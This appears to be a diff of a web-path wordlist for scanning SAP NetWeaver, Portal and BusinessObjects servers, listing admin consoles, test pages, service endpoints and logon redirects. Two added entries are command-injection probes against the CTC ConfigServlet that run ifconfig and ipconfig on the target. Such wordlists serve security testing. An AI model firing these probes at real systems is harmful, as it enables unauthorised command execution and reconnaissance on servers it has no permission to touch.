-/irj/portalapps
-/irj/portalapps/com.petsmart.portal.navigation.masthead.idle_logout
-/irj/portalapps/com.sap.portal.design.portaldesigndata
-/irj/portalapps/com.sap.portal.design.urdesigndata
-/irj/portalapps/com.sap.portal.epcf.loader
-/irj/portalapps/com.sap.portal.navigation.detailedtree
-/irj/sdn/soa-discovery
-/irj/servlet
-/irj/servlet/prt
-/irj/servlet/prt/portal
-/irj/servlet/prt/portal/prtroot
-/irj/servlet/prt/portal/prtroot/com.sap.portal.dsm.terminator
-/irj/servlet/prt/portal/prtroot/com.sap.portal.epcf.loader.wdscriptblockprovider
-/irj/servlet/prt/portal/prtroot/pcd!(*)
-/irj/servlet/prt/portal/prttarget/uidpwlogon/prteventname/performchangepassword
-/KW
-/Lighthammer
-/logon
-/logon/index.jsp
-/logon/logonServlet
-/logon/logonServlet?redirectURL=%2Fuseradmin%2FuserAdminServlet
-/logon/logonServlet?redirectURL=%2FVC%2Fdefault.jsp
-/logon/logonServlet?redirectURL=%Fuseradmin%FuserAdminServlet
-/logon/logonServlet?redirectURL=%FVC%Fdefault.jsp
-/main.html
-/meSync/HttpGRMGTest.html
-/mmr/
-/mmr/mmr/MMRUI.html
-/Modeler
-/modeller/
-/modeller/index.html
-/monitoring
-/monitoring/SystemInfo
-/nwa
-/OpenSQLMonitors/
-/PerformacetraceTraceApplication
-/performanceProvierRoot
-/pmi
-/portal
-/portalapps
-/RE/index.jsp
-/rep/build_info.html
-/rep/build_info.jsp
-/rep/start/index.jsp
-/run/build_info.html
-/run/build_info.jsp
-/rwb/version.html
-/saml
-/samlssodemo_dest
-/samlssodemo_source
-/sap/
-/sap/admin
-/sap/admin/public/index.html
-/sap/bc/bsp/
-/sap/bc/bsp/esh_os_service/favicon.gif
-/sap/bc/bsp/sap
-/sap/bc/bsp/sap
-/sap/bc/bsp/sap/alertinbox
-/sap/bc/bsp/sap/bsp_dlc_frcmp
-/sap/bc/bsp/sap/bsp_veri
-/sap/bc/bsp/sap/bsp_verificatio
-/sap/bc/bsp/sap/bsp_verificatio
-/sap/bc/bsp/sap/bsp_wd_base
-/sap/bc/bsp/sap/bspwd_basics
-/sap/bc/bsp/sap/certmap
-/sap/bc/bsp/sap/certreq
-/sap/bc/bsp/sap/crm_bsp_frame
-/sap/bc/bsp/sap/crm_thtmlb_util
-/sap/bc/bsp/sap/crm_ui_frame
-/sap/bc/bsp/sap/crm_ui_start
-/sap/bc/bsp/sap/crmcmp_bpident/
-/sap/bc/bsp/sap/crmcmp_brfcase
-/sap/bc/bsp/sap/crmcmp_hdr
-/sap/bc/bsp/sap/crmcmp_hdr_std
-/sap/bc/bsp/sap/crmcmp_ic_frame
-/sap/bc/bsp/sap/esh_sap_link
-/sap/bc/bsp/sap/esh_sapgui_exe
-/sap/bc/bsp/sap/graph_bsp_test
-/sap/bc/bsp/sap/graph_bsp_test/Mimes
-/sap/bc/bsp/sap/gsbirp
-/sap/bc/bsp/sap/hrrcf_wd_dovru
-/sap/bc/bsp/sap/htmlb_samples
-/sap/bc/bsp/sap/htmlb_samples
-/sap/bc/bsp/sap/ic_frw_notify
-/sap/bc/bsp/sap/iccmp_bp_cnfirm
-/sap/bc/bsp/sap/iccmp_hdr_cntnr
-/sap/bc/bsp/sap/iccmp_hdr_cntnt
-/sap/bc/bsp/sap/iccmp_header
-/sap/bc/bsp/sap/iccmp_ssc_ll/
-/sap/bc/bsp/sap/it00
-/sap/bc/bsp/sap/it00
-/sap/bc/bsp/sap/it00/default.htm
-/sap/bc/bsp/sap/it00/http_client.htm
-/sap/bc/bsp/sap/it00/http_client_xml.htm
-/sap/bc/bsp/sap/public/bc
-/sap/bc/bsp/sap/public/bc
-/sap/bc/bsp/sap/public/graphics
-/sap/bc/bsp/sap/sam_demo
-/sap/bc/bsp/sap/sam_notifying
-/sap/bc/bsp/sap/sam_sess_queue
-/sap/bc/bsp/sap/sbspext_htmlb
-/sap/bc/bsp/sap/sbspext_htmlb                                                   
-/sap/bc/bsp/sap/sbspext_xhtmlb
-/sap/bc/bsp/sap/sbspext_xhtmlb
-/sap/bc/bsp/sap/spi_admin
-/sap/bc/bsp/sap/spi_monitor
-/sap/bc/bsp/sap/sxms_alertrules
-/sap/bc/bsp/sap/system
-/sap/bc/bsp/sap/system
-/sap/bc/bsp/sap/thtmlb_scripts
-/sap/bc/bsp/sap/thtmlb_styles
-/sap/bc/bsp/sap/uicmp_ltx
-/sap/bc/bsp/sap/xmb_bsp_log
-/sap/bc/contentserver
-/sap/bc/echo
-/sap/bc/erecruiting/applwzd
-/sap/bc/erecruiting/confirmation_e
-/sap/bc/erecruiting/confirmation_i
-/sap/bc/erecruiting/dataoverview
-/sap/bc/erecruiting/password
-/sap/bc/erecruiting/posting_apply
-/sap/bc/erecruiting/qa_email_e
-/sap/bc/erecruiting/qa_email_i
-/sap/bc/erecruiting/registration
-/sap/bc/erecruiting/startpage
-/sap/bc/erecruiting/verification
-/sap/bc/error
-/sap/bc/FormToRfc
-/sap/bc/FormToRfc/soap
-/sap/bc/graphics/net
-/sap/bc/gui/sap/its/CERTREQ
-/sap/bc/gui/sap/its/designs
-/sap/bc/gui/sap/its/webgui
-/sap/bc/IDoc_XML
-/sap/bc/Mi_host_http
-/sap/bc/MIDSD
-/sap/bc/Mime
-/sap/bc/MJC
-/sap/bc/MJC/
-/sap/bc/MJC/mi_host
-/sap/bc/MJC/mi_mds
-/sap/bc/MJC/mi_service
-/sap/bc/MJC/mi_services
-/sap/bc/MY_NEW_SERV99
-/sap/bc/ping
-/sap/bc/report
-/sap/bc/soap/ici
-/sap/bc/soap/rfc
-/sap/bc/srt/IDoc
-/sap/bc/wdvd
-/sap/bc/webdynpro/sap/apb_launchpad
-/sap/bc/webdynpro/sap/apb_launchpad_nwbc
-/sap/bc/webdynpro/sap/apb_lpd_light_start
-/sap/bc/webdynpro/sap/apb_lpd_start_url
-/sap/bc/webdynpro/sap/appl_log_trc_viewer
-/sap/bc/webdynpro/sap/appl_soap_management
-/sap/bc/webdynpro/sap/application_exit
-/sap/bc/webdynpro/sap/ccmsbi_wast_extr_testenv
-/sap/bc/webdynpro/sap/cnp_light_test
-/sap/bc/webdynpro/sap/configure_application
-/sap/bc/webdynpro/sap/configure_component
-/sap/bc/webdynpro/sap/esh_adm_smoketest_ui
-/sap/bc/webdynpro/sap/esh_admin_ui_component
-/sap/bc/webdynpro/sap/esh_admin_ui_component
-/sap/bc/webdynpro/sap/esh_eng_modelling
-/sap/bc/webdynpro/sap/esh_search_results.ui
-/sap/bc/webdynpro/sap/hrrcf_a_act_cnf_dovr_ui
-/sap/bc/webdynpro/sap/hrrcf_a_act_cnf_ind_ext
-/sap/bc/webdynpro/sap/hrrcf_a_act_cnf_ind_int
-/sap/bc/webdynpro/sap/hrrcf_a_appls
-/sap/bc/webdynpro/sap/hrrcf_a_applwizard
-/sap/bc/webdynpro/sap/hrrcf_a_candidate_registration
-/sap/bc/webdynpro/sap/hrrcf_a_candidate_verification
-/sap/bc/webdynpro/sap/hrrcf_a_dataoverview
-/sap/bc/webdynpro/sap/hrrcf_a_draft_applications
-/sap/bc/webdynpro/sap/hrrcf_a_new_verif_mail
-/sap/bc/webdynpro/sap/hrrcf_a_posting_apply
-/sap/bc/webdynpro/sap/hrrcf_a_psett_ext
-/sap/bc/webdynpro/sap/hrrcf_a_psett_int
-/sap/bc/webdynpro/sap/hrrcf_a_pw_via_email_extern
-/sap/bc/webdynpro/sap/hrrcf_a_pw_via_email_intern
-/sap/bc/webdynpro/sap/hrrcf_a_qa_mss
-/sap/bc/webdynpro/sap/hrrcf_a_refcode_srch
-/sap/bc/webdynpro/sap/hrrcf_a_refcode_srch_int
-/sap/bc/webdynpro/sap/hrrcf_a_req_assess
-/sap/bc/webdynpro/sap/hrrcf_a_requi_monitor
-/sap/bc/webdynpro/sap/hrrcf_a_substitution_admin
-/sap/bc/webdynpro/sap/hrrcf_a_substitution_manager
-/sap/bc/webdynpro/sap/hrrcf_a_tp_assess
-/sap/bc/webdynpro/sap/hrrcf_a_unreg_job_search
-/sap/bc/webdynpro/sap/hrrcf_a_unregemp_job_search
-/sap/bc/webdynpro/sap/hrrcf_a_unverified_cand
-/sap/bc/webdynpro/sap/sh_adm_smoketest_files
-/sap/bc/webdynpro/sap/wd_analyze_config_appl
-/sap/bc/webdynpro/sap/wd_analyze_config_comp
-/sap/bc/webdynpro/sap/wd_analyze_config_user
-/sap/bc/webdynpro/sap/wdhc_application
-/sap/bc/webdynpro/sap/WDR_TEST_ADOBE
-/sap/bc/webdynpro/sap/WDR_TEST_EVENTS
-/sap/bc/webdynpro/sap/wdr_test_popups_rt
-/sap/bc/webdynpro/sap/WDR_TEST_TABLE
-/sap/bc/webdynpro/sap/wdr_test_ui_elements
-/sap/bc/webdynpro/sap/WDR_TEST_WINDOW_ERROR
-/sap/bc/webrfc
-/sap/bc/xrfc
-/sap/bc/xrfc_test
-/sap/crm
-/sap/es/cockpit
-/sap/es/getdocument
-/sap/es/opensearch
-/sap/es/opensearch/description
-/sap/es/opensearch/list
-/sap/es/opensearch/search
-/sap/es/redirect
-/sap/es/saplink
-/sap/es/search
-/sap/IStest
-/sap/monitoring/
-/sap/public/bc
-/sap/public/bc                                                                  
-/sap/public/bc/icons
-/sap/public/bc/icons_rtl
-/sap/public/bc/its
-/sap/public/bc/its/designs
-/sap/public/bc/its/mimes
-/sap/public/bc/its/mimes/system/SL/page/hourglass.html
-/sap/public/bc/its/mimes/system/SL/page/hourglass.html
-/sap/public/bc/its/mobile/itsmobile00
-/sap/public/bc/its/mobile/itsmobile01
-/sap/public/bc/its/mobile/rfid
-/sap/public/bc/its/mobile/start
-/sap/public/bc/its/mobile/test
-/sap/public/bc/NW_ESH_TST_AUTO
-/sap/public/bc/NWDEMO_MODEL
-/sap/public/bc/pictograms
-/sap/public/bc/sicf_login_run
-/sap/public/bc/trex
-/sap/public/bc/ur
-/sap/public/bc/ur
-/sap/public/bc/wdtracetool
-/sap/public/bc/webdynpro
-/sap/public/bc/webdynpro/adobechallenge
-/sap/public/bc/webdynpro/mimes
-/sap/public/bc/webdynpro/ssr
-/sap/public/bc/webdynpro/viewdesigner
-/sap/public/bc/webicons
-/sap/public/bc/workflow
-/sap/public/bc/workflow/shortcut
-/sap/public/bsp
-/sap/public/bsp/sap
-/sap/public/bsp/sap
-/sap/public/bsp/sap/htmlb
-/sap/public/bsp/sap/htmlb
-/sap/public/bsp/sap/public
-/sap/public/bsp/sap/public                                                      
-/sap/public/bsp/sap/public/bc
-/sap/public/bsp/sap/public/bc
-/sap/public/bsp/sap/public/faa
-/sap/public/bsp/sap/public/graphics
-/sap/public/bsp/sap/public/graphics/jnet_handler
-/sap/public/bsp/sap/public/graphics/mimes
-/sap/public/bsp/sap/system
-/sap/public/bsp/sap/system
-/sap/public/bsp/sap/system_public
-/sap/public/bsp/sap/system_public
-/sap/public/icf_check
-/sap/public/icf_info
-/sap/public/icf_info/icr_groups
-/sap/public/icf_info/icr_urlprefix
-/sap/public/icf_info/logon_groups
-/sap/public/icf_info/urlprefix
-/sap/public/icman
-/sap/public/icman/ping
-/sap/public/info
-/sap/public/myssocntl
-/sap/public/ping
-/sap/wdisp/admin
-/sap/wdvd
-/sap/webcuif
-/sap/webdynpro/sap/hap_main_document
-/sap/webdynpro/sap/hap_start_page_powl_ui_ess
-/sap/webdynpro/sap/hap_store_page_powl_ui_mss
-/sap/webdynpro/sap/hrtmc_employee_profile
-/sap/webdynpro/sap/hrtmc_rm_maintenance
-/sap/webdynpro/sap/hrtmc_ta_assessment
-/sap/webdynpro/sap/hrtmc_ta_dashboard
-/sap/webdynpro/sap/wd_analyze_config_user
-/SAPIKS
-/SAPIKS2
-/SAPIKS2/contentShow.sap
-/SAPIKS2/jsp/adminShow.jsp
-/SAPIrExtHelp
-/sapmc/sapmc.html
-/scripts/wgate
-/servlet/com.sap.admin.Critical.Actio
-/sim/
-/sim/config/testdata.jsp
-/sim/config/testerror.jsp
-/sim/index.html
-/SLDStart/plain
-/SLDStart/secure
-/socoview
-/socoview/flddisplay.asp
-/SQLtrace/index.html
-/sysconfig
-/tc.lm.webadmin.endtoend.public.app
-/tc/lm/webadmin/clusteradmin
-/teched/test
-/TestJDBC_Web
-/TOdbo
-/top.html
-/TSapq
-/TXmla
-/uddi/
-/uddiclient
-/uddiclient/jsps/index.jsp
-/uddiclient/process/
-/useradmin
-/userhome
-/utl/UsageTypesInfo
-/VC
-/vscantest/
-/webdynpro/dispatcher
-/webdynpro/dispatcher/
-/webdynpro/dispatcher/sap.com/grc~accvwdcomp
-/webdynpro/dispatcher/sap.com/grc~aewebquery
-/webdynpro/dispatcher/sap.com/grc~ccappcomp
-/webdynpro/dispatcher/sap.com/grc~ccxsysbe
-/webdynpro/dispatcher/sap.com/grc~ccxsysbehr
-/webdynpro/dispatcher/sap.com/grc~ffappcomp
-/webdynpro/dispatcher/sap.com/pb/pagebuilder
-/webdynpro/dispatcher/sap.com/tc~kmc~bc.uwl.ui~wd_ui
-/webdynpro/dispatcher/sap.com/tc~kmc~bc.uwl.ui~wd_ui/uwl
-/webdynpro/dispatcher/sap.com/tc~kmc~bc.uwl.ui~wd_ui/uwldetail
-/webdynpro/dispatcher/sap.com/tc~kmc~bc.uwl.ui~wd_ui/uwldisplayhistory
-/webdynpro/dispatcher/sap.com/tc~slm~ui_lup/LUP
-/webdynpro/dispatcher/sap.com/tc~wd~dispwda/servlet_jsp/webdynpro/welcome/root/Welcome.jsp
-/webdynpro/dispatcher/sap.com/tc~wd~tools
-/webdynpro/dispatcher/sap.com/tc~wd~tools/explorer
-/webdynpro/dispatcher/sap.com/tc~wd~tools/WebDynproConsole
-/webdynpro/dispatcher/virsa/ccappcomp/ComplianceCalibrator
-/webdynpro/resources/sap.com/
-/webdynpro/welcome/Welcome.jsp
-/WSConnector/Config?wsdl
-/WSConnector/Config1
-/WSConnector/Config1?wsdl
-/wsd2wsdl
-/wsnavigator
-/wsnavigator/jsps/index.jsp
-/wsnavigator/jsps/redirect.jsp
-/wsnavigator/jsps/sendrequest.jsp
-/wsnavigator/jsps/test.jsp
-/wssproc/cert
-/wssproc/plain
-/wssproc/ssl
+/AdapterFramework/version/version.jsp
+/AdminTools/
+/Adobe
+/AdobeDocumentServices/Config
+/AdobeDocumentServices/Config?wsdl
+/AdobeDocumentServices/Grmg
+/AdobeDocumentServicesSec/Config
+/ADS-EJB
+/ADS-License
+/AE/index.jsp
+/AnalyticalReporting/
+/AnalyticalReporting/AnalyticalReporting_merge_web.xml
+/AnalyticalReporting/download/win32/websetup.properties
+/apidocs/
+/apidocs/allclasses-frame.html
+/apidocs/com/sap/engine/connector/connection/IConnection.html
+/apidocs/com/sap/engine/deploy/manager/DeploymanagerFactory.html
+/apidocs/com/sap/engine/deploy/manager/Deploymanager.html
+/apidocs/com/sap/engine/deploy/manager/LoginInfo.html
+/ApplicationAdminProvider
+/bcb/
+/bcb/bcbadmHome.jsp
+/bcb/bcbadmNavigation.jsp
+/bcb/bcbadmSettings.jsp
+/bcb/bcbadmStart.jsp
+/bcb/bcbadmSystemInfo.jsp
+/bcbtest/start.jsp
+/BI_UDC
+/BizcCommLayerAuthoring/Config1
+/BizcCommLayerAuthoring/Config1?wsdl
+/BizcCommLayerAuthoring/Config?wsdl
+/bwtest
+/caf
+/CAFDataService/Config
+/CAFDataService/Config?wsdl
+/ccsui
+/CmcApp/logon.faces
+/CMSRTS/Config1
+/CMSRTS/Config1?wsdl
+/CMSRTS/Config?wsdl
+/com~tc~lm~webadmin~httpprovider~web
+/CrystalReports/viewrpt.cwr
+/ctc
+/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=ifconfig
+/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=ipconfig%20/all
+/DataArchivingService
+/dispatcher
+/@download@
+/dswsbobje
+/dswsbobje/services/BICatalog?wsdl
+/dswsbobje/services/listServices
+/examples/
+/examples_frame.html
+/examples.html
+/exchangeProfile/
+/GRMGHeartBeat
+/GRMGWSTest/service
+/GRMGWSTest/service?wsdl
+/guid/e067540a-a84c-2d10-77bf-c941bb5a9c7a
+/htmlb/
+/htmlb/docs/api/index.html
+/htmlb/index.html
+/htmlb/jsp/index.jsp
+/htmlb/moresamples.html
+/htmlb/samples.html
+/IciActionItemService/IciActionItemConf
+/IciActionItemService/IciActionItemConf?wsdl
+/IciChatLineService/IciChatLineConf
+/IciChatLineService/IciChatLineConf?wsdl
+/IciChatService/IciChatConf?wsdl
+/IciEventService/
+/IciEventService/IciEventConf
+/IciEventService/IciEventConf?wsdl
+/IciEventService/sap
+/IciFolderService/IciFolderConf
+/IciFolderService/IciFolderConf?wsdl
+/IciItemService/IciItemConf
+/IciItemService/IciItemConf?wsdl
+/IciMessageService/IciMessageConf
+/IciMessageService/IciMessageConf?wsdl
+/IciMonitorService/IciMonitorConf
+/IciMonitorService/IciMonitorConf?wsdl
+/IciPhoneCallService/IciPhoneCallConf
+/IciPhoneCallService/IciPhoneCallConf?wsdl
+/IciSystemService/IciSystemConf
+/IciSystemService/IciSystemConf?wsdl
+/IciUserService/IciUserConf
+/IciUserService/IciUserConf?wsdl
+/IGSCustomizingXML
+/index.html
+/InfoViewApp/
+/InfoViewApp/help/en/user/html/
+/InfoViewApp/listing/main.do?appKind=InfoView&service=%2FInfoViewApp%2Fcommon%2FappService.do
+/inspection.wsil
+/ipcpricing/ui/
+/irj
+/irj/go/km/docs
+/irj/portal
+/irj/portalapps
+/irj/portalapps/com.petsmart.portal.navigation.masthead.idle_logout
+/irj/portalapps/com.sap.portal.design.portaldesigndata
+/irj/portalapps/com.sap.portal.design.urdesigndata
+/irj/portalapps/com.sap.portal.epcf.loader
+/irj/portalapps/com.sap.portal.navigation.detailedtree
+/irj/sdn/soa-discovery
+/irj/servlet
+/irj/servlet/prt
+/irj/servlet/prt/portal
+/irj/servlet/prt/portal/prtroot
+/irj/servlet/prt/portal/prtroot/com.sap.portal.dsm.terminator
+/irj/servlet/prt/portal/prtroot/com.sap.portal.epcf.loader.wdscriptblockprovider
+/irj/servlet/prt/portal/prtroot/pcd!(*)
+/irj/servlet/prt/portal/prttarget/uidpwlogon/prteventname/performchangepassword
+/KW
+/Lighthammer
+/logon
+/logon/index.jsp
+/logon/logonServlet
+/logon/logonServlet?redirectURL=%2Fuseradmin%2FuserAdminServlet
+/logon/logonServlet?redirectURL=%2FVC%2Fdefault.jsp
+/logon/logonServlet?redirectURL=%Fuseradmin%FuserAdminServlet
+/logon/logonServlet?redirectURL=%FVC%Fdefault.jsp
+/main.html
+/meSync/HttpGRMGTest.html
+/mmr/
+/mmr/mmr/MMRUI.html
+/Modeler
+/modeller/
+/modeller/index.html
+/monitoring
+/monitoring/SystemInfo
+/nwa
+/OpenSQLMonitors/
+/PerformacetraceTraceApplication
+/performanceProvierRoot
+/pmi
+/portal
+/portalapps
+/RE/index.jsp
+/rep/build_info.html
+/rep/build_info.jsp
+/rep/start/index.jsp
+/run/build_info.html
+/run/build_info.jsp
+/rwb/version.html
+/saml
+/samlssodemo_dest
+/samlssodemo_source
+/sap/
+/sap/admin
+/sap/admin/public/index.html
+/sap/ap
+/sap/bc/abap/demo
+/sap/bc/abap/demo_apc
+/sap/bc/abap/demo_apc_pcp
+/sap/bc/abap/demo_mime
+/sap/bc/abap/demo_post
+/sap/bc/abap/docu
+/sap/bc/abap/toolsdocu
+/sap/bc/adt
+/sap/bc/apc/sap/apc_tcp_test_stateful
+/sap/bc/apc/sap/apc_tcp_test_stateless
+/sap/bc/apc_test/abap_online_com
+/sap/bc/apc_test/file
+/sap/bc/apc_test/ping
+/sap/bc/apc_test/ping_ping
+/sap/bc/apc_test/ping_pong/game
+/sap/bc/apc_test/ping_pong/player
+/sap/bc/apc_test/sapui5_test
+/sap/bc/apc_test/sohbat
+/sap/bc/apc_test/system_info
+/sap/bc/batch/event_raise
+/sap/bc/bcs/sms
+/sap/bc/bsp/
+/sap/bc/bsp/esh_os_service/favicon.gif
+/sap/bc/bsp/ipro/editor
+/sap/bc/bsp/sap
+/sap/bc/bsp/sap/alertinbox
+/sap/bc/bsp/sap/bsp_dlc_frcmp
+/sap/bc/bsp/sap/bsp_veri
+/sap/bc/bsp/sap/bsp_verificatio
+/sap/bc/bsp/sap/bsp_wd_base
+/sap/bc/bsp/sap/bspwd_basics
+/sap/bc/bsp/sap/certmap
+/sap/bc/bsp/sap/certreq
+/sap/bc/bsp/sap/crm_bsp_frame
+/sap/bc/bsp/sap/crmcmp_bpident/
+/sap/bc/bsp/sap/crmcmp_brfcase
+/sap/bc/bsp/sap/crmcmp_hdr
+/sap/bc/bsp/sap/crmcmp_hdr_std
+/sap/bc/bsp/sap/crmcmp_ic_frame
+/sap/bc/bsp/sap/crm_ic_ise/editor
+/sap/bc/bsp/sap/crm_thtmlb_util
+/sap/bc/bsp/sap/crm_ui_frame
+/sap/bc/bsp/sap/crm_ui_start
+/sap/bc/bsp/sap/esh_sapgui_exe
+/sap/bc/bsp/sap/esh_sap_link
+/sap/bc/bsp/sap/graph_bsp_test
+/sap/bc/bsp/sap/graph_bsp_test/Mimes
+/sap/bc/bsp/sap/gsbirp
+/sap/bc/bsp/sap/hrrcf_wd_dovru
+/sap/bc/bsp/sap/htmlb_samples
+/sap/bc/bsp/sap/iccmp_bp_cnfirm
+/sap/bc/bsp/sap/iccmp_hdr_cntnr
+/sap/bc/bsp/sap/iccmp_hdr_cntnt
+/sap/bc/bsp/sap/iccmp_header
+/sap/bc/bsp/sap/iccmp_ssc_ll/
+/sap/bc/bsp/sap/ic_frw_notify
+/sap/bc/bsp/sap/it00
+/sap/bc/bsp/sap/it00/default.htm
+/sap/bc/bsp/sap/it00/http_client.htm
+/sap/bc/bsp/sap/it00/http_client_xml.htm
+/sap/bc/bsp/sap/public/bc
+/sap/bc/bsp/sap/public/FAA
+/sap/bc/bsp/sap/public/graphics
+/sap/bc/bsp/sap/public/sem
+/sap/bc/bsp/sap/sam_demo
+/sap/bc/bsp/sap/sam_notifying
+/sap/bc/bsp/sap/sam_sess_queue
+/sap/bc/bsp/sap/sbspext_htmlb
+/sap/bc/bsp/sap/sbspext_xhtmlb
+/sap/bc/bsp/sap/spi_admin
+/sap/bc/bsp/sap/spi_monitor
+/sap/bc/bsp/sapsrm
+/sap/bc/bsp/sapsrm/bsp_dhtml_apple
+/sap/bc/bsp/sapsrm/bsp_java_applet
+/sap/bc/bsp/sapsrm/call_sig_ctrl
+/sap/bc/bsp/sapsrm/ctlg_wrapper
+/sap/bc/bsp/sap/sxms_alertrules
+/sap/bc/bsp/sap/system
+/sap/bc/bsp/sap/thtmlb_scripts
+/sap/bc/bsp/sap/thtmlb_styles
+/sap/bc/bsp/sap/uicmp_ltx
+/sap/bc/bsp/sap/xmb_bsp_log
+/sap/bc/contentserver
+/sap/bc/docu
+/sap/bc/echo
+/sap/bc/echo 
+/sap/bc/erecruiting/applwzd
+/sap/bc/erecruiting/confirmation_e
+/sap/bc/erecruiting/confirmation_i
+/sap/bc/erecruiting/dataoverview
+/sap/bc/erecruiting/password
+/sap/bc/erecruiting/posting_apply
+/sap/bc/erecruiting/qa_email_e
+/sap/bc/erecruiting/qa_email_i
+/sap/bc/erecruiting/registration
+/sap/bc/erecruiting/startpage
+/sap/bc/erecruiting/verification
+/sap/bc/error
+/sap/bc/error 
+/sap/bc/FormToRfc
+/sap/bc/FormToRfc/soap
+/sap/bc/graphics/net
+/sap/bc/gui/sap/its/CERTREQ
+/sap/bc/gui/sap/its/designs
+/sap/bc/gui/sap/its/webgui
+/sap/bc/IDoc_XML
+/sap/bc/MIDSD
+/sap/bc/Mi_host_http
+/sap/bc/Mime
+/sap/bc/MJC
+/sap/bc/MJC/
+/sap/bc/MJC/mi_host
+/sap/bc/MJC/mi_mds
+/sap/bc/MJC/mi_service
+/sap/bc/MJC/mi_services
+/sap/bc/MY_NEW_SERV99
+/sap/bc/ping
+/sap/bc/report
+/sap/bc/soap/ici
+/sap/bc/soap/rfc
+/sap/bc/srt/IDoc
+/sap/bc/ui5_ui5/ui2/ushell/shells/abap/Fiorilaunchpad.html?
+/sap/bc/ui5_ui5/ui2/ushell/shells/abap/Fiorilaunchpad.html?saml2=disabled
+/sap/bc/wdvd
+/sap/bc/wdvd/
+/sap/bc/webdynpro
+/sap/bc/webdynpro/sap/apb_launchpad
+/sap/bc/webdynpro/sap/apb_launchpad_nwbc
+/sap/bc/webdynpro/sap/apb_lpd_light_start
+/sap/bc/webdynpro/sap/apb_lpd_start_url
+/sap/bc/webdynpro/sap/application_exit
+/sap/bc/webdynpro/sap/appl_log_trc_viewer
+/sap/bc/webdynpro/sap/appl_soap_management
+/sap/bc/webdynpro/sap/ccmsbi_wast_extr_testenv
+/sap/bc/webdynpro/sap/cnp_light_test
+/sap/bc/webdynpro/sap/configure_application
+/sap/bc/webdynpro/sap/configure_component
+/sap/bc/webdynpro/sap/esh_admin_ui_component
+/sap/bc/webdynpro/sap/esh_adm_smoketest_ui
+/sap/bc/webdynpro/sap/esh_eng_modelling
+/sap/bc/webdynpro/sap/esh_search_results.ui
+/sap/bc/webdynpro/sap/hrrcf_a_act_cnf_dovr_ui
+/sap/bc/webdynpro/sap/hrrcf_a_act_cnf_ind_ext
+/sap/bc/webdynpro/sap/hrrcf_a_act_cnf_ind_int
+/sap/bc/webdynpro/sap/hrrcf_a_appls
+/sap/bc/webdynpro/sap/hrrcf_a_applwizard
+/sap/bc/webdynpro/sap/hrrcf_a_candidate_registration
+/sap/bc/webdynpro/sap/hrrcf_a_candidate_verification
+/sap/bc/webdynpro/sap/hrrcf_a_dataoverview
+/sap/bc/webdynpro/sap/hrrcf_a_draft_applications
+/sap/bc/webdynpro/sap/hrrcf_a_new_verif_mail
+/sap/bc/webdynpro/sap/hrrcf_a_posting_apply
+/sap/bc/webdynpro/sap/hrrcf_a_psett_ext
+/sap/bc/webdynpro/sap/hrrcf_a_psett_int
+/sap/bc/webdynpro/sap/hrrcf_a_pw_via_email_extern
+/sap/bc/webdynpro/sap/hrrcf_a_pw_via_email_intern
+/sap/bc/webdynpro/sap/hrrcf_a_qa_mss
+/sap/bc/webdynpro/sap/hrrcf_a_refcode_srch
+/sap/bc/webdynpro/sap/hrrcf_a_refcode_srch_int
+/sap/bc/webdynpro/sap/hrrcf_a_req_assess
+/sap/bc/webdynpro/sap/hrrcf_a_requi_monitor
+/sap/bc/webdynpro/sap/hrrcf_a_substitution_admin
+/sap/bc/webdynpro/sap/hrrcf_a_substitution_manager
+/sap/bc/webdynpro/sap/hrrcf_a_tp_assess
+/sap/bc/webdynpro/sap/hrrcf_a_unregemp_job_search
+/sap/bc/webdynpro/sap/hrrcf_a_unreg_job_search
+/sap/bc/webdynpro/sap/hrrcf_a_unverified_cand
+/sap/bc/webdynpro/sap/sh_adm_smoketest_files
+/sap/bc/webdynpro/sap/wd_analyze_config_appl
+/sap/bc/webdynpro/sap/wd_analyze_config_comp
+/sap/bc/webdynpro/sap/wd_analyze_config_user
+/sap/bc/webdynpro/sap/wdhc_application
+/sap/bc/webdynpro/sap/WDR_TEST_ADOBE
+/sap/bc/webdynpro/sap/WDR_TEST_EVENTS
+/sap/bc/webdynpro/sap/wdr_test_popups_rt
+/sap/bc/webdynpro/sap/WDR_TEST_TABLE
+/sap/bc/webdynpro/sap/wdr_test_ui_elements
+/sap/bc/webdynpro/sap/WDR_TEST_WINDOW_ERROR
+/sap/bc/webrfc
+/sap/bc/workflow/shortcut
+/sap/bc/xrfc
+/sap/bc/xrfc_test
+/sap/BSSP_SP_MAPS
+/sap/crm
+/sap/es/atk
+/sap/es/cockpit
+/sap/es/getdocument
+/sap/es/opensearch
+/sap/es/opensearch/description
+/sap/es/opensearch/list
+/sap/es/opensearch/search
+/sap/es/redirect
+/sap/es/saplink
+/sap/es/search
+/sap/gw
+/sap/gw/bep
+/sap/gw/jsonrpc
+/SAPIKS
+/SAPIKS2
+/SAPIKS2/contentShow.sap
+/SAPIKS2/jsp/adminShow.jsp
+/SAPIrExtHelp
+/sap/IStest
+/sapmc/sapmc.html
+/sap/monitoring/
+/sap/public
+/sap/public/bc
+/sap/public/bc/abap
+/sap/public/bc/abap/docu
+/sap/public/bc/abap/mime_demo
+/sap/public/bc/abap/toolsdocu
+/sap/public/bc/apc_test
+/sap/public/bc/apc_test/apc_tcp_test_sf
+/sap/public/bc/apc_test/apc_tcp_test_sl
+/sap/public/bc/AR_NEWS_REDRCT
+/sap/public/bc/bpo
+/sap/public/bc/bsp
+/sap/public/bc/clms
+/sap/public/bc/crm_cic_ipaddr
+/sap/public/bc/crm_cic_polling
+/sap/public/bc/dashboard
+/sap/public/bc/icf
+/sap/public/bc/icf/logoff
+/sap/public/bc/icons
+/sap/public/bc/icons_rtl
+/sap/public/bc/its
+/sap/public/bc/its/designs
+/sap/public/bc/its/img
+/sap/public/bc/its/mimes
+/sap/public/bc/its/mimes/system/SL/page/hourglass.html
+/sap/public/bc/its/mobile
+/sap/public/bc/its/mobile/itsmobile00
+/sap/public/bc/its/mobile/itsmobile01
+/sap/public/bc/its/mobile/rfid
+/sap/public/bc/its/mobile/start
+/sap/public/bc/its/mobile/test
+/sap/public/bc/its/scripts
+/sap/public/bc/jsm
+/sap/public/bc/NWDEMO_MODEL
+/sap/public/bc/NW_ESH_TST_AUTO
+/sap/public/bc/pictograms
+/sap/public/bc/qgm
+/sap/public/bc/sec
+/sap/public/bc/sec/cdc_ext_service
+/sap/public/bc/sec/oauth2
+/sap/public/bc/sec/oauth2/client
